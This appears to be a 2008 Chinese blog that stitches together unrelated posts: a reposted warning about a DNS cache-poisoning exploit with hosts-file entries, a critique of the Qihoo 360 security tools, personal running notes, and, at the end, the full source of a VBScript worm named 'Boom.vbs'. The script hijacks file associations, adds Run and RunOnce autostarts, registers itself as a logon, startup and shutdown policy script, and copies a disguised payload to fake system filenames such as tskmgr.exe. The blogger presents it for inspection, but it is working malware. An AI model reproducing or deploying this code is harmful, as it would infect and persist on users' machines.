对联式悲哀

发信人: sshnuke (Eagle he flies high above us), 信区: HackerVsSecurity
标  题: DNS攻击代码现身，各位自重zz
发信站: 日月光华 (2008年07月24日13:47:11 星期四)

DNS攻击程序已然出现了，今天凌晨I)ruid和H D Moore公布了DNS的详细攻击代码。按照一般的修补速度来说，相当怀疑国内部分DNS服务器尚未修补该漏洞。因此提前提醒各位，常去的网站一定做静态的DNS解析，另外，不要打开奇怪和不受信任的网站。

64.233.189.147 google.com
64.233.189.147 www.google.com
209.85.143.18 mail.google.com
203.208.37.99 google.cn
203.208.37.99 www.google.cn
64.233.161.83 gmail.com

-------------转载完毕---------------

总之，在地址栏输ip代替网址肯定没错啦，
不用代理上网的人也可以把这些写到hosts文件里面

欢迎转载，但请保留作者：MaaJiaa@Virus.Zone3.RYGH

客观的讲作为一款免费软件，360还是做得很不错的。可是由于奇虎恶心的宣传策略，一款普通的安全辅助软件俨然已经变成了像杀毒软件一样的装机必备，仿佛有了360就有了安全保障。

360系列全套软件看起来很多，可是其中你能找出属于奇虎自己的技术么？不过都是把别人的技术买过来，或者把别人免费但不知名的东西弄过来而已。当然弄过来之后经360整合，用起来还是很方便的。以下是对360系列软件的一些个人看法，欢迎拍砖。

360安全卫士本家
360安全卫士是个什么东西，仅仅是和xx上网助手、xx安全助手类似的小的安全辅助工具而已。
很多小白几百年也不晓得更新一次杀毒软件的病毒库，某天突发奇想用360扫描，哇~~扫出了这么多木马，还有这么多漏洞！360好强大阿！最近之所以很多人突然发现360安全卫士好用，是因为最近某木马下载器类型的病毒有些泛滥，该病毒有一两个主体，中毒之后会调用该主体下载其他几十上百个木马。等到你发现机器中毒的时候，通常已经木马遍地机器运行速度严重减慢了。这时候拿360扫描，显然结果就是一大堆木马，删掉之后机器速度也正常了，于是“360把毒杀干净啦”。可是病毒主体根本没解决掉，于是过段时间又死灰复燃，再360扫描，如此循环。实际上，凡是360能扫出来的木马，是个合格的杀毒软件同样也能扫出来，而且只会比它扫得更全面删得更彻底。而对于驱动级别保护的病毒，即便是专业的杀毒软件，也不一定能解决掉。
总的来说，作为免费的安全工具，360安全卫士还是很不错的，界面、易用性等等都比较好。类似的软件也有很多人推荐Windows清理助手，也是同样优秀的免费软件。
不管怎样，切记：360只是一个安全工具，不要把它当成杀毒软件来用，如果你以为系统里面装一个360安全卫士就不用其他杀毒软件和防火墙，你会死得很惨。还有，360论坛上的那些文章没有阅读价值，有些甚至会误导，这可能也和360定位的使用群体中小白比较多有关。
还有一点很重要，如果你使用的是卡巴斯基网络套装KIS，或者卡巴斯基工作站版本，以及Adobe Acrobat 9.0的专业版，请不要使用360的清理恶评插件以及清除木马功能，该功能会破坏上述软件的一些开机启动项（所以对于卡巴误杀360的事件，我对360不怎么同情）。

360安全浏览器
“沙箱”技术是从Sandboxie手上买过来的，浏览器就是世界之窗，完全没有原创技术。什么是沙箱？简单的讲就是开辟一块单独的空间，上网的时候所有代码、程序都约束在这块空间以内运行，不允许穿透这块空间去访问修改系统的其它部分，从而达到把恶意代码隔离的目的。
在正式版本出来之前，elysion@RYGH曾经对360的安全浏览器做过简单的测试，直接下载病毒本体，然后在沙箱中运行，效果还不错。但是他发现了一个大Bug：如果下载的不是可执行文件，而是压缩包，选择在沙盘中运行会调用WinRAR，然后在WinRAR中双击压缩包里面的可执行文件，就变成在沙盘外直接运行了。不知道正式版本这个bug有没有修复。
另外，沙箱也不是如360宣称的那样绝对安全，Sandboxie在拦截键盘记录测试中的表现不算特别好，如果有盗号木马运行在沙箱中，它们仍然可以发挥作用盗取在沙箱外输入的密码。（引用elysion的测试报告）
总的来说这个东西还值得一用，但是不要迷信360的宣传而放松警惕。

360 APR防火墙
关于什么是ARP攻击，可以参考本人以前写的一篇《ARP攻击扫盲贴》。
360号称的什么内核层拦截我也懒得管，我只知道当局域网内本来就存在ARP欺骗攻击的时候，360会把假的网关当成真的网关保护起来。（解决方法在此）
360很聪明，看到瑞星防火墙ARP防御导致网络负担增加，严重影响局域网内通信的前车之鉴，于是大肆宣扬自己绝对不增加网络负担，可是你不给网关发包主动防御，别人不骗你只骗网关怎么办？能“完美解决”局域网内ARP攻击的方法，只有找到攻击源让它杀毒。
其实这也不能怪360没有用，一切都归咎于ARP协议本身的漏洞太容易利用，可是360的宣传词太无耻。不论说辞多么天花乱坠，实际上这个ARP防火墙的防御效果就相当于：
1. 首先运行cmd，然后输入arp -a，把列表里面的网关ip和网关mac抄下来；
2. 然后打开记事本，输入一行字“arp -s 网关ip 网关mac”，保存为arp.bat文件；
3. 再把这个文件拖放到开始菜单的启动栏里面，over。
当然360实现了更多的功能，例如受到攻击会报警，读取数据包里面的ip信息并显示出来等等，可是真正能起到的防御效果和以上3个步骤毫无区别，不可能“完美解决局域网内ARP攻击问题”。
这个东西或许也可以用一下，但是请不要对它的效果抱有太大的希望，只能保证不因中毒机器的ARP攻击而断网（别人主动恶意攻击你不在讨论范围之列）。
P.S. 不管是什么公司出的ARP防火墙，都不能当作真正的网络防火墙来用，这点不要弄混淆。同时推荐一款国产新兴的免费网络防火墙——风云防火墙，规则项很全面，但是需要使用者对网络稍有一定了解。

360系统诊断工具
这个东西就是个废物，无非是把注册表里面的几个项导出来，然后把任务管理器里面能看到的进程名字抄下来。连每个进程里面注入了哪些线程都不能看到，更不用说扫描隐藏进程、扫描API Hook劫持等等功能了。用这个生成的扫描报告什么都做不了，纯粹浪费时间。如果真的需要发扫描报告求助杀毒，推荐使用SREng。

360时间保护器
这个东西我没用过，修改系统时间的手法就只能对卡巴斯基起效，这个也算是卡巴斯基的大漏洞吧，只要改改系统时间就可以轻易的放倒卡巴。
有需要也可以用一下，360会给你弄个驱动，相应的代价是占用一定的系统资源。

360恶意网站屏蔽器
把Hosts文件编辑写个图形界面的小程序出来，就摇身一变成了安全工具，实在令人匪夷所思...
所谓的Hosts文件在C:\WINDOWS\system32\drivers\etc目录下面，可以用记事本打开编辑。打开以后#开头的行是注释行，里面还有“127.0.0.1  localhost”这类似的内容，127.0.0.1代表ip地址，locahost代表网址。如果在下面加一行“10.0.0.0  www.baidu.com”就表示当你访问www.baidu.com时会自动跳转到10.0.0.0，而跳转到127.0.0.1则表示不访问网络。因此，把那些恶意网站的网址全都添加到hosts文件里面，然后指向127.0.0.1，就可以实现屏蔽恶意站点的功能。
360推出的这个工具不能算安全工具，顶多是个记事本加强版而已。另外，hosts列表屏蔽恶意网站，对使用代理上网的人不起效。

360文件粉碎工具
这个也是废物，虽然360号称它可以粉碎“一切顽固文件”，可是拿它删正在运行中的病毒根本删不掉。
免费的强制删除工具有很多，像Unlocker、PowerRmv、XDelBox等等，这其中我尤其推荐使用XDelBox，不止因为它能删除驱动级文件，而且它可以在系统外部进行清除，这样病毒的任何保护机制都无能为力了。（光华Virus版版大snowflurry语）

360网吧还原系统保护器
没用过不清楚。在此借地膜拜一下某大牛，把他的Ring0级别绕过还原保护的代码公布到了网上，于是天下大乱...

360安全卫士修复工具
没用过，想来也是废物一个，连CRC效验检查360主程序有没有被修改的功能都不具备。
中了病毒就应该立即在安全模式下用杀毒软件全盘扫描，找360有什么用？

360即将推出的免费杀毒软件
已经确定是和BitDefender总部直接合作的，不管是不是把BitDefender的免费激活码拿过来重新发，也不管最终推出的免费版本到底能实现BitDefender的多少功能，至少可以给我们多提供一种免费的选择。BitDefender也算一款不错的杀毒软件，比较汗的是，它曾经被评为性价比第一，于是被某些英文小白当成“世界第一”的杀毒软件到处宣传。(－ －;;;)

强度和距离都太腐败，不计入总里程...

脚上那块骨头没有长大的趋势，但是也没见消多少
20来分钟的草坪，大约只有3km，当作积极恢复吧...
但愿心肺功能不至于继续退化，或者至少能退化得慢一点

真羡慕那些穿高跟鞋还能悠哉游哉的逛街的mm
今天出门稍微多走了点路，回来腿又不行了
在草坪上绕了快10分钟才舒服点
为什么刷个40圈一点问题都没有，逛街走路我就这么废..>_<..

以下为Boom.vbs的全部内容，
稍微懂点英语和注册表的人应该都知道它干了些什么...
P.S. 我这算不算在自己的blog里灌水涨文章数？

dim fs,rg
set fs = createobject("scripting.filesystemobject")
set rg = createobject("wscript.shell")
on error resume next
rg.regwrite "HKCR\.vbs\", "VBSFile"
rg.regwrite "HKCU\Control Panel\Desktop\SCRNSAVE.EXE", " C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com"
rg.regwrite "HKCU\Control Panel\Desktop\ScreenSaveTimeOut", "30"
rg.regwrite "HKCR\MSCFile\Shell\Open\Command\", "C:\WINDOWS\pchealth\Global.exe"
rg.regwrite "HKCR\regfile\Shell\Open\Command\", "C:\WINDOWS\pchealth\Global.exe"
rg.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\", "C:\WINDOWS\system32\dllcache\Default.exe"
rg.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\", "C:\WINDOWS\system32\dllcache\Default.exe"
rg.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\", "C:\WINDOWS\system\KEYBOARD.exe"
rg.regwrite "HKEY_CLASSES_ROOT\MSCFile\Shell\Open\Command\", "C:\WINDOWS\Fonts\Fonts.exe"

rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff#CONTENT#\DisplayName","Local Group Policy"
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff#CONTENT#\FileSysPath",""
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff#CONTENT#\GPO-ID","LocalGPO"
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff#CONTENT#\GPOName","Local Group Policy"
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff#CONTENT#\SOM-ID","Local"
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff#CONTENT##CONTENT#\Parameters",""
rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff#CONTENT##CONTENT#\Script","C:\WINDOWS\Cursors\Boom.vbs"

rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown#CONTENT#\DisplayName", "Local Group Policy"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown#CONTENT#\FileSysPath", ""
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown#CONTENT#\GPO-ID", "LocalGPO"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown#CONTENT#\GPOName", "Local Group Policy"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown#CONTENT#\SOM-ID", "Local"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown#CONTENT##CONTENT#\Parameters", ""
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown#CONTENT##CONTENT#\Script", "C:\WINDOWS\Cursors\Boom.vbs"

rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup#CONTENT#\DisplayName", "Local Group Policy"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup#CONTENT#\FileSysPath", ""
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup#CONTENT#\GPO-ID", "LocalGPO"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup#CONTENT#\GPOName", "Local Group Policy"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup#CONTENT#\SOM-ID", "Local"
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup#CONTENT##CONTENT#\Parameters", ""
rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup#CONTENT##CONTENT#\Script", "C:\WINDOWS\Cursors\Boom.vbs"

If Not fs.fileexists("C:\WINDOWS\Fonts\Fonts.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\Fonts\Fonts.exe")
If Not fs.fileexists("C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com")
If Not fs.fileexists("C:\WINDOWS\pchealth\Global.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\pchealth\Global.exe")
If Not fs.fileexists("C:\WINDOWS\system\KEYBOARD.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\system\KEYBOARD.exe")
If Not fs.fileexists("C:\WINDOWS\system32\dllcache\Default.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\system32\dllcache\Default.exe")
If Not fs.fileexists("C:\windows\system32\drivers\drivers.cab.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\windows\system32\drivers\drivers.cab.exe ")
If Not fs.fileexists("C:\windows\media\rndll32.pif ") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\windows\media\rndll32.pif")
If Not fs.fileexists("C:\windows\fonts\tskmgr.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\windows\fonts\tskmgr.exe")